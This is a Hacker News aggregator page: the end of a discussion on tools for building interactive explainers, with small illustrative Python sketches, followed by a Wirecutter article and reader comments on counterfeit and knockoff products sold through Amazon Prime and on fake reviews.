- and an outliner storage model with 'external reference' transcluded nodes, to build and evolve projects from the tool itself, without an external IDE.

Several companies are very close, but none of them includes all these pieces, as some of them come from programming language design and others from user interaction; right now, only a very senior interdisciplinary team would know how to integrate them all in a single unified approach.
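
To make the first ingredient concrete, here's a toy version of spreadsheet-style reactive cells, where editing an input recomputes everything derived from it (illustrative only; a real system would need dependency ordering, cycle detection, and so on):

    class Cell:
        def __init__(self, value=None, formula=None, inputs=()):
            self.value, self.formula, self.inputs = value, formula, inputs
            self.dependents = []
            for cell in inputs:
                cell.dependents.append(self)
            if formula:
                self.recompute()

        def set(self, value):               # edit an input cell
            self.value = value
            for dep in self.dependents:
                dep.recompute()

        def recompute(self):                # re-derive, then cascade
            self.value = self.formula(*(c.value for c in self.inputs))
            for dep in self.dependents:
                dep.recompute()

    hours = Cell(8)
    days = Cell(5)
    weekly = Cell(formula=lambda h, d: h * d, inputs=(hours, days))

    days.set(4)            # the model reacts like a spreadsheet
    print(weekly.value)    # -> 32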

spyckie2(10000) 6 days ago [-]

What would make explorables really take off is a killer framework that makes building them easier, à la Ruby on Rails.

I know ncase has built some frameworks and I applaud his work, but this space just needs a lot more investment.

Here's what I think the killer framework will do really, really well. (Note this is VERY rough; it comes from spending 20 minutes trying to create an explorable a long time ago and realizing that the tooling just isn't right.)

- 1) Turn the act of coding a model into mostly verbal reasoning by having a great framework language / API. Rails actually did this, turning the act of building a website into composing English. It greatly reduced the distance between the concepts / app that you were building and how you went about building it - i.e. Model has_many :users

- 2) A standardized convention on inputs, outputs, relationships, defaults, and time (step functions).

- 2b) A standardized convention of defining one unit, populations and groups of units within populations

- 3) Automated scaffolding to display raw data, with add-on libraries to easily scaffold formatted or visual data.

- 3b) Automated scaffold to visualize a unit, a population, groups within populations, and units within groups (a scaffold of a population is like table rows)

- 3c) The language / API should also make it dead simple and intuitive to control converting from numerical data to textual data - i.e. if you are modeling stress, what does 60 points of stress mean? (There's a toy sketch of points 1-3 after this list.)

I think something inspired by ActiveModel (my Rails bias is showing) would be a great way to define the above, since a strong way to define your data is also how you would get automatic scaffolding language and high-level functions on top of it.

- 4) A dead simple way to display and embed models anywhere. 1 line of javascript or a 1 line import and you can plug it into jekyll, hugo, (any static site generator, really)

- 5) A killer tutorial.
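
To make points 1-3 concrete, here's a toy, runnable approximation (every class and function name here is invented; no such framework exists):

    import random

    class Person:                                   # 2b: one "unit"
        def __init__(self):
            self.stress = random.randint(0, 100)

        def describe(self):                         # 3c: numbers -> text
            return "calm" if self.stress < 60 else "stressed"

    class Population:                               # 2b: a population of units
        def __init__(self, n=10):
            self.units = [Person() for _ in range(n)]

        def step(self):                             # 2: standardized time step
            for u in self.units:
                u.stress = max(0, u.stress - 5)     # everyone relaxes a little

    def scaffold(pop):                              # 3: raw-data display
        for i, u in enumerate(pop.units):
            print(f"unit {i}: stress={u.stress} ({u.describe()})")

    pop = Population()
    pop.step()
    scaffold(pop)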

TuringTest(3135) 5 days ago [-]

Funny that your #1 requirement, for me, would be turning coding into mostly visual reasoning. Different skillsets, I suppose.

I think of code as laying out the results of a program execution (in terms of changing GUIs or lists of transformed data), and then building up an abstraction that captures all the instances.

So, a visual tool that let me paint examples, and build (named) abstractions that group them, would be my ideal development environment. Spreadsheets are the oldest tools that somewhat support this desired workflow, and things like Bret Victor's Ladder of Abstraction or tools like http://aprt.us/ are the next level, but still fall short.

paulgb(2079) 6 days ago [-]

I haven't used it myself, but I wonder if Idyll comes close? https://idyll-lang.org/

mathisonian(3863) 6 days ago [-]

We're working on this with https://idyll-lang.org/, it does some of the things you mention already (standard conventions for how to do common tasks, standard set of widgets, handles loading data, extensible plugin system, etc).

But it is a big undertaking and there is still a lot of work to do. If anyone on HN wants to contribute or give feedback you can reach me at mconlen at cs dot washington dot edu.

TruthSHIFT(10000) 6 days ago [-]

There's so much content there. But this explanation of particles is pretty great:

https://manytinythings.github.io/

truebosko(4235) 6 days ago [-]

Love the language here. Even see this as a meaningful way to explain concepts to children.

zupreme(4178) 6 days ago [-]

May just be me, but I am getting no audio in the music item when using iOS.

Looks interesting though.

jamil7(4279) 5 days ago [-]

Same on FF on desktop. I think HN might have brought the streaming server to its knees.





Historical Discussions: Which of these Amazon Prime purchases are real? (February 21, 2020: 819 points)

(833) Which of these Amazon Prime purchases are real?

833 points 4 days ago by zdw in 39th position

thewirecutter.com | Estimated reading time – 19 minutes | comments | anchor

You can probably tell at a glance that a "Chanel" handbag going for $20 at a flea market is fake. But you might not give a second thought to items that arrive on your doorstep via Amazon Prime. With the rise of third-party sellers on Amazon, maybe you should.

Although Amazon has taken many measures to prevent counterfeits and unsafe products from showing up on its site, plenty of fakes still slip through. Over the past several months, we've purchased counterfeits and knockoffs making fraudulent safety claims and encountered a few instances in which a seller switched in an authentic product but from a discontinued or lesser-quality line—all delivered through Amazon Prime. We also obtained authentic items, either directly from the manufacturer or with confirmation from the brand. While the fakes and knockoffs may look like the real products at first glance, they're often lower in quality, sometimes hiding potential health or safety issues.

Many people think that counterfeits and knockoffs are so obviously inferior—visually and otherwise—that it's easy to spot the difference between a fake and the real thing. But increasingly, that's not the case with counterfeits purchased online. Test yourself: Can you spot the real thing in the photos below?

1. The 'Ove' Glove

  • The product listing for the counterfeit 'Ove' Glove looked authentic, with plenty of positive ratings and the coveted "Amazon's Choice" label. This fake was sold by a third-party seller not associated with the manufacturer.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

  • On the left, the real 'Ove' Glove; on the right, the counterfeit 'Ove' Glove. Photo: Rozette Rago

  • A customer review claiming they received a fake.

  • On the left, the real 'Ove' Glove package; on the right, the counterfeit. Photo: Rozette Rago

The innovative design of The 'Ove' Glove pairs five-finger mobility with heat-proof materials, which helps cooks get a better grip on hot pans. It was an early recommendation on Wirecutter and is made by Joseph Enterprises, a small company based in San Francisco that also produces the as-seen-on-TV Clapper and Chia Pet.

The counterfeit glove, which we purchased from this Amazon page from a third-party seller, looked almost identical to the real thing, with near-perfect packaging. The major differences:

  • The real glove's blue lines were cleaner, and there was a tag inside with material information as well as a loop for hanging. The fake glove arrived with a snag in the weave.
  • The heat protection was slightly better on the real glove, which was thicker and had a longer wrist. The fake glove's painted-on lines gave off a melted-plastic smell when we used it to hold a heated cast-iron pan for 10 seconds.
  • The real glove cost us $5 more than the fake glove, a 50 percent difference.

Although knockoffs are also present on separate Amazon listings, counterfeit 'Ove' Gloves often pop up on the product page for the real 'Ove' Glove, according to Michael Hirsch, vice president of Joseph Enterprises. To combat them, the company buys the fakes and then informs Amazon of the copyright infringement. Getting the fake gloves removed from Amazon can be a long process, Hirsch said, taking weeks or even months of playing whack-a-mole with counterfeit sellers: "Once they're off, they come back under a different brand and name."

It's easy to see why the fakes persist. We found counterfeit 'Ove' Gloves for sale for about $2 a piece in bulk on Alibaba, the photograph clearly showing a knockoff version with black stitching instead of white around the wrist.

The authentic 'Ove' Glove is available for purchase through a page indicating that it is sold and shipped by Amazon.com or sold by Joseph Ent, the Amazon storefront for Joseph Enterprises.

The seller was blocked not long after I purchased the glove, and their storefront no longer exists.

2. Kylie Cosmetics matte lipstick

  • The seller we purchased the counterfeit Kylie kit from is no longer active on Amazon.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

  • We purchased the genuine Dolce K and Kandy K lipsticks (left) directly from kyliecosmetics.com. We bought the knockoff Dolce K and Kandy K (right) from Amazon. Photo: Rozette Rago

  • A customer review claiming that this product is fake.

  • On the left, Kylie Cosmetics's The OG Lip Trio; on the right, the Amazon-purchased Birthday Edition Kylie Lip Kit, which appears to be an unauthorized fake version of an old kit that is no longer for sale on the Kylie Cosmetics site. Photo: Rozette Rago

  • Left to right: Kylie Cosmetics Dolce K, Amazon Dolce K, Kylie Cosmetics Candy K, Amazon Candy K. The knockoffs had a different color and a plasticky, cloying smell. Photo: Rozette Rago

Wildly popular Kylie Cosmetics celebrated Kylie Jenner's 19th birthday in 2016 with Birthday Edition kits in gold packaging that allegedly sold out in less than 30 minutes. Buying a three-year-old lipstick kit in 2019 is gross enough; the idea of putting something totally untraceable that might contain dangerous ingredients or bacteria on my mouth is frightening.

Of course, the 2016 kit is no longer for sale on the Kylie Cosmetics site. We were not able to get confirmation with the brand on the authenticity of the Amazon kit, but the differences between the real Kylie lipsticks and the Amazon version we bought were pretty obvious:

  • The counterfeit lip kit had multiple spelling errors on the list of ingredients, including "Distearoimonium" instead of "Disteardimonium" and "Blsmuth" instead of "Bismuth."
  • The products smelled and looked different. The Amazon-sold Candy K lipstick was a brighter pink than the authentic Kylie Candy K lipstick, while the Amazon-sold Dolce K was more rosy than the authentic version. The formula was equally matte and immovable.
  • The original mini matte kit went for $36, whereas we paid nearly $30 for the version on Amazon.

On Netflix's documentary series Broken, a woman named Khue Nong claims to have purchased a fake Kylie lip kit on eBay that glued her lips together. She resorted to using acetone nail polish remover to unseal her lips.

The Amazon kit we bought was sold by a third-party seller.

3. Child travel booster seat

  • The seller we purchased from no longer lists the knockoff booster seat for sale.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

  • On top, the knockoff YXTDZ portable and foldable child safety seat. At the bottom, the authentic Mifold car booster seat. Photo: Rozette Rago

  • The Mifold (bottom) uses aluminum in its construction, while the YXTDZ seat (top) uses a metallic-colored plastic sticker. Photo: Rozette Rago

Anyone who has had to move a child's car seat from one vehicle to another, or who has attempted to take a kid in a taxi, can immediately understand the appeal of the minimalist Mifold travel booster seat, a patented, Indiegogo-born booster that folds up smaller than an iPad for easy transport from one car to another.

The differences between a knockoff called the YXTDZ portable and foldable child safety seat and the authentic Mifold were easy for us to eyeball:

  • Whereas the Mifold used aluminum to reinforce the seat belt guides, the knockoff had a metallic-colored sticker that mimicked the look of metal. The materials on the YXTDZ felt flimsier.
  • The Mifold's lap-belt guide locked into place in three positions, while the YXTDZ's did not lock in place at all.
  • The Mifold had a label with instructions and safety and manufacture information stitched onto the seat (as required by federal regulation), while the YXTDZ did not.
  • We purchased the YXTDZ seat via a third-party seller with fulfillment by Amazon Prime for nearly $24. The Mifold was about $33, sold and shipped by Amazon.

Although the YXTDZ booster is not trying to pass itself off as a Mifold by name, it's clearly a knockoff of the Mifold's unique design. And it's not the only one: Mifold CEO Jon Sumroy told us that he began to see copycats almost as soon as the company launched. "They don't copy exactly the design, but what they have done is copy the concept of the product." (Sumroy compares his invention against cheap knockoffs in this video.) The physical differences are clear, but it's those invisible differences—including the fact that whereas the Mifold is compliant with federal safety requirements for child-restraint systems, the knockoff does not appear to be—that are far more worrisome.

The listing no longer exists.

4. Child travel harness

  • The product page falsely claimed this knockoff harness had FAA approval. The listing is no longer active.

  • Click the right arrow to see which one is FAA-approved. Photo: Rozette Rago

  • On the left, the Kids Fly Safe CARES harness, the only FAA-approved child harness available; on the right, the knockoff, which has a label that falsely advertises FAA approval. Photo: Rozette Rago

The Kids Fly Safe CARES (Child Aviation Restraint System) airplane safety harness is meant to allow you to secure smaller children, between 22 and 44 pounds, on a plane without needing to lug a heavy car seat along. The patented and trademarked harness is made by AmSafe, an aviation-products manufacturer that makes restraint systems for 600 airlines, according to the company's website. The AmSafe harness has been certified (PDF) as having an ELOS (Equivalent Level of Safety) to a car seat, a Federal Aviation Administration representative told us: "It is the only harness-type child safety restraint that the FAA has certified."

As for the differences in comparison with the knockoff:

  • Despite the fact that the authentic Kids Fly Safe CARES harness is the only restraint system of its type certified by the FAA, the Toddler Airplane Travel Safety Harness we purchased via Amazon Prime fraudulently claimed to have FAA approval.
  • The authentic CARES harness felt much more substantial, with thicker belt material, strongly reinforced stitching, and shoulder straps that locked into place with metal-reinforced buckles. The Amazon-purchased harness had thin, plastic buckles—including, inexplicably, latches to release the shoulder straps. The cheaper harness's adjustable shoulder straps did not lock in place.
  • Whereas the CARES device had safety installation and manufacture information printed directly on the belt, the bought-on-Amazon harness arrived with a paper printout only.

Charley Fussner, a business unit manager at AmSafe, told us that the company has suffered "significant losses - hundreds of thousands of dollars in sales" due to knockoff harnesses that look like the Kids Fly Safe harness but lack the FAA stamp of approval. Amazon removed the listing we purchased the mislabeled harness from, but others remain.

5. Philips Sonicare Sensitive toothbrush heads

  • The Amazon product page for the Sonicare toothbrush heads we ordered presented the items as being the same thing we'd get buying from Philips or a local pharmacy.

  • On the left, the Sonicare Sensitive toothbrush heads we purchased from Philips; on the right, the discontinued Sonicare Sensitive toothbrush heads we purchased from Amazon. Photo: Rozette Rago

  • A customer review claiming they received a knockoff.

  • The current model (left) costs about the same as the discontinued model (right). Photo: Rozette Rago

  • The Sonicare Sensitive toothbrush heads we purchased from Philips (left) have softer bristles than the discontinued Sonicare Sensitive toothbrush heads we purchased from Amazon (right). Photo: Rozette Rago

We've recommended the Sonicare toothbrush for over four years in the Wirecutter guide to electric toothbrushes. The cost to own one can add up over time because the heads can be expensive—around $8 each, which amounts to $32 a year if you replace them at the recommended three-month interval. Still, we recommend using the brand-name heads over cheap generics for better feel and the confidence of using American Dental Association–approved accessories.

It took me some digging to reach the conclusion that a malfunctioning head I bought for my own use in 2019 wasn't actually a fake but was likely discontinued stock with a slightly different design and harder bristles than the newer design had. I found minor but noticeable differences between Sonicare Sensitive toothbrush heads purchased from a third-party seller through Amazon Prime and those purchased through the Philips website:

  • I purchased Sonicare Sensitive toothbrush heads from Philips.com for almost $27 for a pack of three. The outdated Sonicare Sensitive toothbrush heads that I purchased from a third-party seller on Amazon cost $30 for three, so the older heads were actually the more expensive ones.
  • On the Philips-purchased head, the bristles were softer and the head was a bit wider. One of the heads I received from Amazon did not fit well on the toothbrush handle, falling off with a little shaking.
  • The logo on the neck of the Philips-purchased head was raised and textured, and the metal ring on the bottom of the head appeared to be slightly wider and more matte. The logo on the Amazon-purchased head looked narrower and was not raised or textured.
  • The packaging on the Philips-purchased toothbrushes matched current fonts and logos used on Sonicare packaging, with a copyright date on the box of 2017. The label on the Amazon-bought brushes had a copyright date of 2012, and the printing was grainier.
The toothbrush head we purchased from Amazon fell off the toothbrush with a little shaking. Video: Rozette Rago

The Amazon seller returned my money after I asked whether the toothbrush heads were authentic. A representative from Philips Sonicare's customer support looked at pictures of my Amazon-bought toothbrush head and said that the head was an older version, and that Sonicare has since made improvements to the brush head. The Amazon-purchased toothbrush heads seem to have been old or discontinued stock.

6. Tweezerman Slant Tweezers

  • On the left, the Tweezerman 1230-BR tweezers we recommend, purchased from Tweezerman; on the right, the 1230-BP, a similar pair of tweezers from a different Tweezerman line. Photo: Rozette Rago

  • The tweezers look very similar, but you can see that the tip on the 1230-BR (left) is a bit sharper and broader than that of the 1230-BP (right). Photo: Rozette Rago

  • A customer review claims these are fake. We noticed the same differences in thickness between the 1230-BR we purchased from Tweezerman and the 1230-BP we got from Amazon. This Amazon product page has 238 one-star reviews, many claiming that they received fakes.

Tweezerman tweezers have been Wirecutter picks for many years for their filed-down sharpness and superior grip. However, for much of that time we've been warning readers to avoid buying counterfeit tweezers from third-party sellers on Amazon and recommending buying from other retailers, such as Bed Bath & Beyond and Sephora.

We compared a recently purchased set of Tweezerman tweezers delivered via Amazon Prime with a pair we bought directly from Tweezerman. Although we concluded that the Amazon pair was not actually fake, as many customer reviews claim, we did find that the seller had swapped in a model that was different from what was listed on the page (the 1230-BP from the Tweezerman Professional line instead of the 1230-BR from the standard line; the 1230-BP is a model that seems inferior to the tweezers we have long recommended in our guide).

Here are the differences we found:

  • While the angles and length of the tweezers were identical, the Tweezerman-purchased tweezers had thinner tips with more surface area than those on the tweezers we purchased from Amazon. That made the Tweezerman-purchased pair feel sharper against the skin, with a better grip on the smallest hairs.
  • The packaging was completely different, with the Amazon-bought tweezers labeled "Tweezerman Professional," despite both packages having copyright dates of 2017 with identical Allure 2018 Best of Beauty stickers. The Amazon-purchased tweezers were labeled 1230-BP, even though the listing was for the 1230-BR.
  • The Tweezerman-purchased tweezers sold for $23, whereas the Amazon-purchased tweezers were $13—nearly half the price.

We were not able to reach anyone at Tweezerman to confirm the authenticity of the Amazon-purchased pair. A call to Tweezerman's customer service did confirm that there is a Tweezerman Professional line sold at retailers such as Sally Beauty Supply.

Have something you want us to look at and investigate for authenticity? Send a photo and details to [email protected], and we'll compare what you have with what we tested.

Further reading

  • Counterfeit goods have proliferated along with e-commerce. Here's your primer on the growing world of fake products—and the forces working to combat them.
  • It's easier than ever before to mistakenly buy a counterfeit or knockoff product online. Here's what to do when it happens to you.
  • Counterfeit goods sold online today are trickier to distinguish from the real thing than flea market knockoffs. Here, the new rules to spotting fake products.



All Comments: [-] | anchor

president(3430) 1 day ago [-]

Does anyone know if/why it is legal for China to be producing and selling these blatantly knock-off products? It seems outrageous that they are able to sell a product with the same EXACT name (the 'Ove' Glove example in the link) as the copied product.

gowld(10000) 1 day ago [-]

What are you going to do, file a complaint with the WTO?

nkrisc(4311) about 23 hours ago [-]

No it's not legal, but who's going to do anything about it? Good luck suing a Chinese company in China. You might have better luck sending them a letter asking them nicely to stop counterfeiting your product.

ng12(10000) 2 days ago [-]

This happened to me the first time this Christmas. Bought a $25 electric doodad that was 'sold by Amazon' for a family member and it was obviously a fake. It came in a very generic white box with the company logo stamped on it, inside was a product that looked completely different and was non-functional. Not only that, but the product was difficult to return (I had to contact support) which makes me suspect Amazon knew it was a fishy product.

It has completely shaken my faith in Amazon. This is probably my last year as a Prime subscriber.

hnick(10000) 1 day ago [-]

If it's sold by Amazon, they should be 100% liable for selling counterfeit goods, just like anyone else.

californical(10000) 1 day ago [-]

I bought a monitor once on amazon a couple of years ago. It seemed legit -- packaging looked authentic. Monitor looked authentic. But the power cable was really weird and clunky. It had no branding on it, and everything was written in Chinese. It barely fit into the monitor, and the monitor would only turn on if the cable was in exactly the right position. This was an LG monitor, and not a cheap one, so I contacted amazon and they accepted the return and sent a replacement. Well, the replacement was even worse. Same thing where the power cable seemed incredibly cheap and the monitor itself seemed fine, but I couldn't even get it to turn on unless I was actively holding the power cable into the monitor.

Ended up just returning it again, but thought it was a fluke. I still used amazon for a while, but this type of thing has become so common that I don't use them anymore at all.

wombat-man(10000) 2 days ago [-]

They'll actually pro-rate refund for your remaining time with prime if you cancel. At least they did for me.

clairity(2970) 2 days ago [-]

at the risk of upping the amazon paranoia (which i think is valid but blown out of proportion), i also had a little fake product issue recently with amazon.

i had bought two glass (kitchen) storage jars a year ago and decided in november to order one more. the new one was about 10% smaller with slightly different markings, just similar enough that it wasn't noticeable on first glance, but was obvious when placed next to the other two jars.

initially, i assumed it was a warehouse mix-up, so i requested a replacement. the replacement was exactly the same smaller jar and not the original. mind you, the original was already a chinese-made & branded item. the replacement was a cheaper knockoff of what was probably already a ridiculously marked-up import. luckily it was only a minor hassle to return both and get a refund.

i'm not a big amazon shopper and avoid their own electronics like kindles and echos (don't need more plutocratic surveillance in my life), but for anything of (at least moderate) value, i'll sometimes double-check against photos on amazon and manufacturer's sites. fakes have generally not been a significant problem for me.

poulsbohemian(10000) 2 days ago [-]

You could tell by looking at the two gloves in the story that they were different, but the 'fake' actually looked better to my eyes - the blue rubber appeared thicker and more pronounced. Which brings up a really interesting question about fakes - if they are as good or better than the products they are mocking, are they actually 'fakes'? I fully recognize that there is a need to protect copyright / trade dress / brand and that there is a distinct consumer interest in ensuring that products are safe / made from safe materials, BUT - so many of the products that are cloned on Amazon are only distinguishable by price anyway, and have no unique value proposition from one 'brand' to the next.

toast0(10000) 1 day ago [-]

I think there's certainly a terminology issue here.

A product that looks like a name brand product, but doesn't claim to be that product is one thing.

A product that claims to be the name brand product, but isn't, is a different thing.

The name brand probably doesn't want either to be easily available, and will call them both fake. A purchaser might want to take a chance on the former, but shouldn't have to risk getting the latter.

heavyset_go(4298) 2 days ago [-]

> if they are as good or better than the products they are mocking, are they actually 'fakes'

Quality of an individual product aside, the issue surrounding counterfeits is that confidence in the market as a whole will wane, which isn't good for anybody.

Symbiote(4295) 2 days ago [-]

'The fake glove's painted-on lines gave off a melted-plastic smell when we used it to hold a heated cast-iron pan for 10 seconds.'

graylights(10000) 1 day ago [-]

Even if it's just as good, you lose all warranty protections. Also if a counterfeit safety product fails and injures someone, good luck.

ThePhysicist(3784) 2 days ago [-]

It's funny: I always thought the Internet and platforms like Amazon with the collaborative reviewing system would make brands more and more obsolete, because you could just pick high-quality products from smaller manufacturers by looking at user reviews.

Now I find that I rely more and more on brands to decide which things I buy, because I simply cannot trust user reviews in most cases. Recently there are more and more Chinese sellers flooding Amazon (Germany) with products that have hundreds of well-written positive reviews. I have to assume that most of them are fake because there's no way that some niche product can have more reviews than, let's say, a PS4 or Nintendo Switch, which sells millions of units.

Really a shame that Amazon does not seem to care much about this, maybe a chance for the smaller shops to take back some lost business though. I find that I buy more in smaller e-commerce shops, because I find they're much less affected by the review fraud and often ship things just as fast as Amazon.

zweep(10000) 1 day ago [-]

This was one of the early theories about how Facebook would monetize -- that your real-life friends would value their relationship with you too highly to recommend anything but truly great products to you. That hit the reality that people would squander most of their friends for their stupid MLM scheme.

jay_kyburz(4293) 1 day ago [-]

I think Amazon should employ hundreds of everyday people to review products full time.

When you list a product on Amazon, you have to pay 10-20 of those Amazon employees to review the product at arm's length.

Say each reviewer is given 2 hours for each product; before you can list a product on Amazon, you have to pay 2 hours x 20 reviewers x the hourly rate (see the sketch below).

These should be the only reviews.

Or you can sell your product with no reviews.
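
A back-of-the-envelope sketch of that proposal's listing fee. The 2 hours and 20 reviewers come from the comment; the $25/hour reviewer rate is an assumed figure for illustration only:

    # Listing fee under the proposed pay-for-independent-reviews model.
    HOURS_PER_REVIEWER = 2       # from the comment
    REVIEWERS_PER_PRODUCT = 20   # upper end of the comment's 10-20 range
    HOURLY_RATE_USD = 25         # assumption, not from the comment

    listing_fee = HOURS_PER_REVIEWER * REVIEWERS_PER_PRODUCT * HOURLY_RATE_USD
    print(f"Up-front review cost per listing: ${listing_fee}")
    # prints: Up-front review cost per listing: $1000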

mbesto(3255) 1 day ago [-]

> Really a shame that Amazon does not seem to care much about this, maybe a chance for the smaller shops to take back some lost business though. I find that I buy more in smaller e-commerce shops, because I find they're much less affected by the review fraud and often ship things just as fast as Amazon.

And this will effectively be Amazon's undoing. Given how much central power and authority they control over global retail, this is a good thing. Competition is good for the consumer.

sokoloff(4037) 1 day ago [-]

I've bought a few things that offered an Amazon gift card after a 5-star review. In some cases, the product was genuinely good and while I'd not have bothered to write a review, the gift card is enough to get me to write the review. I'm not going to write a good review for a crap product, but I bet plenty of people do.

harimau777(10000) 1 day ago [-]

I wish Amazon would just let you select which countries you wanted to include/exclude (both for made in and sold by). It wouldn't be perfect, but it would at least allow me to filter out fly by night Chinese manufacturers.

pdonis(4075) 1 day ago [-]

> Now I find that I rely more and more on brands to decide which things I buy

It's interesting that you say this, since Amazon itself is a brand--but not the kind of brand you're looking for. You are looking for reliable quality, and Amazon's brand is quick and cheap.

EE84M3i(4024) 1 day ago [-]

> platforms like Amazon

You can't use the word 'platform' at Amazon, nor the word 'marketplace'; it's in violation of the mandatory legal training for FTEs.

andrewfromx(2988) 1 day ago [-]

I think the director of engineering at Amazon charged with making sure reviews are not fake would say: 'we can only make it so difficult to create a new account and prove you are human before it literally becomes impossible for new people to make real accounts.' You say Amazon has to police this more. I say Amazon has tried, and there is so much money to be made in jumping through the hoops to prove you are a human that there is no way to win this war.

LetThereBeNick(10000) 1 day ago [-]

I've been happy with the "ReviewMeta" chrome extension, which evaluates the product reviews on any amazon site, and displays a score indicating how likely it is the ratings have been manipulated. It shows examples of flagged reviews which can be pretty funny. Chrome lets you limit extension permissions by domain, so I don't worry about it snooping on the rest of my browsing.

But you're right about brands. When it comes to certain products like phone chargers, the manipulation is so rampant I stick with the same supplier.

Nasrudith(10000) 1 day ago [-]

Personally I would phrase it more cynically - the brand is fundamentally a lie even in a magical no-counterfeiting world. It had a purpose once as an 'index,' but it hasn't been that way for a while.

Essentially, all a brand says is that they got money for it. It says nothing about how it was made, or that they won't decide to cut corners for their next quarterly earnings no matter how many years it was good.

In practice, given how often the 'counterfeits' are made in the same factory by the same workers with materials from the same supplier, the money going there is no guarantee of either product quality or righteousness.

Trying to use brand for delegating quality control is doomed to failure in the real world.

I suspect the better approach towards product identification would be going by verifiable specifications and manufacturers, and doing both shopping and any enforcement based upon that. It would be hard as hell to transition society towards that as a norm, though, with marketer saturation, time investment, and every manufacturer having a financial incentive to try to decommoditize themselves to improve yields and protect themselves from competition.

mc3(4144) 1 day ago [-]

Maybe this is what will save bricks and mortar? Guess where I buy any product I am going to ingest, put on my skin or plug into a wall?

A real store with some special online exceptions, but those exceptions are never going to be Amazon or Ebay.

There are some shady real stores selling shit too of course, so I have to be choosy, but I'm feeling pretty safe at a national supermarket chain, or Kmart.

habanany(10000) 1 day ago [-]

It's probable PS4 and Nintendo users are too busy playing, so they have no time to write a review. I'm just saying.

andrepd(3720) 1 day ago [-]

But what do brands matter if the issue is counterfeits/knockoffs?

professorTuring(4234) 1 day ago [-]

That is exactly what I feel.

More and more I find Amazon to be closer and closer to a Chinese bazaar of cheap, low-quality items (kind of an AliExpress or dx but with a different perceived quality).

I believe they will gain a lot of customers among people who just want cheap stuff (or don't care if it is original as long as the brand is clearly visible and it is cheaper), but they will definitely lose customers that use Amazon for convenience (more or less the same price, better refund policies, availability of products...)

It's a pity. Hopefully others will fill that space.

In Spain, El Corte Inglés with its new on-line platform is getting closer and closer.

InternetOfStuff(10000) 1 day ago [-]

> Now I find that I rely more and more on brands to decide which things I buy, because I simply cannot trust user reviews in most of the cases.

The other day I came across something interesting: two comments, for two different but related products (dynamos). One comment was in German, the other in Italian, but they both had the same non-sequitur in them.

Apparently scammers reuse comments across products (not surprising) and languages (more surprising).

EmpirePhoenix(10000) 1 day ago [-]

Also funny, my result of this is that I now order basically everything directly via aliexpress. If all i get is chinese crap anyway, I can at least get it cheaper.

Then I noticed that aliexpress actually made some pretty good page design choices. Since you can see how long a seller has been registered and how many they have sold (both directly on the product information page), it is pretty easy to find an at least decent trader there.

pjc50(1454) 1 day ago [-]

One of the important lessons of the internet is that unless there's very deliberate suppression, noise will drown out signal if there's the slightest incentive to spam.

Anything that can be faked will be faked in bulk.

sn4pp(10000) 1 day ago [-]

Just got scammed on one of those smaller sites, f it, I'll buy on amazon so I at least get anything shipped to me.

Dylan16807(10000) 1 day ago [-]

This issue isn't reviews vs. brands. The biggest problem with Amazon is that the reviews and brands are disconnected from the actual supplier. Who knows what you'll get?

perjes(10000) about 12 hours ago [-]

I'd recommend using https://reviewmeta.com. It filters out suspicious reviewers and makes it much easier to avoid products with bought reviews on Amazon. Wouldn't make purchases there without it.

hrktb(4316) 1 day ago [-]

I think we are going in the expected direction, but we're not at the end yet.

About brands, we've seen the rise of comparison sites and review videos that allow unknown products to rise to the top. I'd say that's pretty in line with your expectations towards user reviews. We just have more experienced, less influenceable/buyable reviewers (in general). For instance the top vacuum cleaner on Wirecutter doesn't need to be a Dyson to get recognized.

The main issue here is really Amazon messing with the supply chain and injecting fakes where they could be guaranteeing genuine products instead. In a sense, looking at a Wirecutter-like site and buying directly from the maker is the best of both worlds.

reaperducer(4097) 2 days ago [-]

Now I find that I rely more and more on brands to decide which things I buy

I do the same. I wish I didn't, but I don't know what the practical alternative is. I guess it's the whole reason that brands were created in the first place.

I do source some of my stuff from smaller brands and shops, whenever I can. But that's not always an option.

When it comes to software, I'm not entirely satisfied with Apple's 'walled garden.' But for hardware, I know that if I get something at the Apple Store, or from apple.com, I generally don't have to worry.

It's because of this that I wish Apple† would go back into some of the product lines it has abandoned. Wifi routers. Servers. Printers and scanners. Even AA batteries and blank DVDs (I still have some of both). I'm at the point where I'll pay extra for confidence in the product.

† Or some other tech company that cares about its brand.

baybal2(2038) 1 day ago [-]

> Really a shame that Amazon does not seem to care much about this

No, no, no! They do care, and a lot!

Amazon has been busy catching up to, and undercutting, Alibaba on the China-US route for the last 5 years.

Amazon has managers whose full time job is to poach vendors from Alibaba.

I'm getting spammed by their salespeople non-stop.

leoh(3920) 1 day ago [-]

> It's funny: I always thought the Internet and platforms like Amazon with the collaborative reviewing system would make brands more and more obsolete, because you could just pick high-quality products from smaller manufacturers by looking at user reviews.

Totally agree. I think a lot of people feel this way, which is why it's so lucrative for Amazon and sellers to cheat on reviews.

sfifs(4313) 1 day ago [-]

> because you could just pick high-quality products from smaller manufacturers by looking at user reviews

Well, one of the things big brands - especially in the consumer products industry like the one I work in - do quite religiously is product testing during research and a lot of QA during manufacturing, to eliminate as far as possible the risk of safety issues.

We sometimes take competitive products through the same tests, and while what some of the small producers sometimes produce wouldn't be illegal, we'd never run with those standards. Bigger competitors tend to be largely fine.

int_19h(10000) 1 day ago [-]

Chinese manufacturers themselves seem to follow this model. When they sell cheap junk, you see those one-shot noname brands. But once some market niche is flooded at the bottom, and the only way to get more of that market is to expand into higher-quality offerings, you start seeing established brands that care about their reputation, to the point where they sometimes outdo Western brands. One example that I know through my hobby is Holosun - not only do they compete directly, and quite successfully, against Western market leaders on features and quality, but, in the US at least, they have live support based in the country - not the usual call center somewhere in India.

myopenid(10000) 1 day ago [-]

You're right, user reviews on Amazon are manipulated. Bought a bluetooth earphone on Amazon DE, and was contacted by the vendor offering to exchange a five-star review for a half refund.

Also came across Facebook ads that ask you to buy random crap and leave a positive review in exchange for a full refund, and they call this 'free sampling'.

inoop(4319) about 23 hours ago [-]

> Really a shame that Amazon does not seem to care much about this

Amazon cares, but Chinese sellers are paying Amazon customers to write fake reviews for them. There's an article about it here:

https://www.buzzfeednews.com/article/nicolenguyen/her-amazon...

This practice basically makes it impossible to tell fake reviews from real ones.

Aweorih(10000) about 17 hours ago [-]

I saw a documentary a while ago on YouTube where a German family bought a smartphone over Amazon, which was from China (not sure anymore if they knew that at the time). It then exploded some time later while charging. They said that Amazon also did not care much, and it took a while until the listing was removed.

